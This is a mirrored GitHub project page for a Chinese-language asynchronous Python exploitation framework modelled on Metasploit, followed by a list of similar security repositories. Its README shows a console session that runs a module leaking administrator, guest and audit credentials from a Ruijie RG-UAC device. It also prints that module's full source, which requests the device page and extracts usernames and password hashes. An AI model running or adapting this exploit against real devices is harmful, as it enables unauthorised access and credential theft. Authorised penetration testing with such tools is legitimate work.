GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Amzza0x00 → Zerooo-Exploitation-Framework

Amzza0x00 / Zerooo-Exploitation-Framework

Licence: GPL-3.0 License
异步漏洞利用框架

Programming Languages

python
139335 projects - #7 most used programming language

Labels

securityframeworkhackingexploitspentestingvulnerabilitiesexploitation-framework

Projects that are alternatives of or similar to Zerooo-Exploitation-Framework

Arissploit
Arissploit Framework is a simple framework designed to master penetration testing tools. Arissploit Framework offers simple structure, basic CLI, and useful features for learning and developing penetration testing tools.
Stars: ✭ 114 (+418.18%)
Mutual labels:  exploits, vulnerabilities, exploitation-framework
Poc
Advisories, proof of concept files and exploits that have been made public by @pedrib.
Stars: ✭ 376 (+1609.09%)
Mutual labels:  exploits, vulnerabilities
Featherduster
An automated, modular cryptanalysis tool; i.e., a Weapon of Math Destruction
Stars: ✭ 876 (+3881.82%)
Mutual labels:  exploits, exploitation-framework
Exploitpack
Exploit Pack -The next generation exploit framework
Stars: ✭ 728 (+3209.09%)
Mutual labels:  exploits, exploitation-framework
Hacker ezines
A collection of electronic hacker magazines carefully curated over the years from multiple sources
Stars: ✭ 72 (+227.27%)
Mutual labels:  exploits, vulnerabilities
Poc Exploits
Select proof-of-concept exploits for software vulnerabilities to aid in identifying and testing vulnerable systems.
Stars: ✭ 111 (+404.55%)
Mutual labels:  exploits, vulnerabilities
Kernelpop
kernel privilege escalation enumeration and exploitation framework
Stars: ✭ 628 (+2754.55%)
Mutual labels:  exploits, vulnerabilities
Patrowlhears
PatrowlHears - Vulnerability Intelligence Center / Exploits
Stars: ✭ 89 (+304.55%)
Mutual labels:  exploits, vulnerabilities
0days In The Wild
Repository for information about 0-days exploited in-the-wild.
Stars: ✭ 149 (+577.27%)
Mutual labels:  exploits, vulnerabilities
Securityexploits
This repo has been migrated to https://github.com/github/security-lab/tree/master/SecurityExploits
Stars: ✭ 239 (+986.36%)
Mutual labels:  exploits, vulnerabilities
ructfe-2019
RuCTFE 2019. Developed with ♥ by HackerDom team
Stars: ✭ 24 (+9.09%)
Mutual labels:  vulnerabilities
jshodan
Powerful Shodan API client using RxJava and Retrofit
Stars: ✭ 56 (+154.55%)
Mutual labels:  exploits
Bash
Collection of bash scripts I wrote to make my life easier or test myself that you may find useful.
Stars: ✭ 19 (-13.64%)
Mutual labels:  exploits
clair-cicd
Making CoreOS' Clair easily work in CI/CD pipelines
Stars: ✭ 27 (+22.73%)
Mutual labels:  vulnerabilities
exploit
Collection of different exploits
Stars: ✭ 153 (+595.45%)
Mutual labels:  exploits
cwe-sdk-javascript
A Common Weakness Enumeration (CWE) Node.js SDK compliant with MITRE / CAPEC
Stars: ✭ 18 (-18.18%)
Mutual labels:  vulnerabilities
Nightingale
It's a Docker Environment for pentesting which having all the required tool for VAPT.
Stars: ✭ 119 (+440.91%)
Mutual labels:  vulnerabilities
exploits
Exploits developed by me.
Stars: ✭ 35 (+59.09%)
Mutual labels:  exploits
OSCE
Some exploits, which I’ve created during my OSCE preparation.
Stars: ✭ 74 (+236.36%)
Mutual labels:  exploits
freaker
automation framework for kenzerdb
Stars: ✭ 17 (-22.73%)
Mutual labels:  exploits
View All Similar Projects ➔

ZeroooSploit - Exploitation Framework

漏洞利用框架

安装

需要模块:

  • aiohttp

运行

git clone https://github.com/Amzza0x00/Zerooo-Exploitation-Framework.git
cd Zerooo-Exploitation-Framework
python3 console.py

                                                 _       _ _ 1.0.0#dev
 _______ _ __ ___   ___   ___  ___ _ __ | | ___ (_) |_
|_  / _ \ r'__/ _ \ / _ \ / _ \/ __| '_ \| |/ _ \| | __|
 / /  __/ | | (_) | (_) | (_) \__ \ |_) | | (_) | | |_
/___\___|_|  \___/ \___/ \___/|___/ .__/|_|\___/|_|\__|
                                  |_|

        Zerooo Exploitation Framework

+ -- --=[ 5 exploits - 4 auxiliary       ]



zsf > setg proxy http://127.0.0.1:7890
2021/06/15 16:14:34 [*] proxy => http://127.0.0.1:7890
zsf > use exploit/ruijie/rg-uac-passleak
zsf (rg-uac-passleak) > show options

Module options (exploit/ruijie/rg-uac-passleak):

Name           Current Setting                    Required        Description
----           ---------------                    --------        -----------
targets        https://192.168.1.2:3001           yes             目标url,多个目标请用,分开


zsf (rg-uac-passleak) > run
2021/06/12 16:14:49 [*] Running module exploit/ruijie/rg-uac-passleak...
2021/06/12 16:14:49 [*] Current task 1
2021/06/12 16:15:12 [+] name:admin,password:8b6ebdca5ad9f22c64a831f9ab262159
2021/06/12 16:15:12 [+] name:guest,password:fcf41657f02f88137a1bcf068a32c0a3
2021/06/12 16:15:12 [+] name:audit,password:d33542b8458db8cabd9843fe7c1e8784
2021/06/12 16:15:12 [*] exploit complete
zsf (rg-uac-passleak) >

模版

基本结构

import re

from zerooo.core.asyncpool import async_run  # 协程运行
from zerooo.core.log import LOGGER  # 颜色输出
from zerooo.core.options import Option  # 设置获取exp属性
from zerooo.request.httpclient import HttpClient  # 异步http发包
from zerooo.utils.util import get_target  # 切分多个目标


# 定义Zerooosploit类,继承Option
class Zerooosploit(Option):

    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            'Name': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露',  # exp名字
            'Module': 'exploit/ruijie/rg-uac-passleak',  # exp路径
            'Product': '锐捷RG-UAC统一上网行为管理审计系统',  # 产品
            'Cve': '',  # cve编号
            'Create_date': '20210411',  # 创建日期
            'Description': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台',  # 描述
            'Authors': '',  # 作者
            'References': ''  # 参考链接
        }

        self.option = {
        """
        注册exp所需参数
        Current Setting 参数默认值, Required 可选/必须, Description 参数描述
        """
            'targets': {'Current Setting': '', 'Required': 'yes', 'Description': '目标url,多个目标请用,分开'},
        }

    # async def定义异步函数
    async def rg_uac_passleak(self, target):
        # 请求方式、路径等
        resp = await HttpClient().send_request_cgi('GET', url=target)
        return resp

    # 定义异步回调函数,用于处理结果
    def rg_uac_passleak_callback(self, future):
        resp = future.result()
        if resp['code'] == 200:
            result = resp['text']
            user = re.findall('"name":"(.*?)"', result)
            password = re.findall('"password":"(.*?)"', result)
            for i in range(len(user)):
                msg = f'name:{user[i]},password:{password[i]}'
                LOGGER.success(msg)

        else:
            msg = 'The target ' + str(resp['url']) + ' not vuln !'
            LOGGER.info(msg)

    # 运行方法
    def exploit(self):
        # 调用get_options方法获取参数
        targets = get_target(self.get_options('targets'))
        # async_run 异步调用 arg1 异步对象 arg2 可迭代对象 arg3 异步回调函数
        async_run(self.rg_uac_passleak, targets, self.rg_uac_passleak_callback)
        LOGGER.info('exploit complete')

反馈

欢迎issues

参考

RouterSploit
Metasploit

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].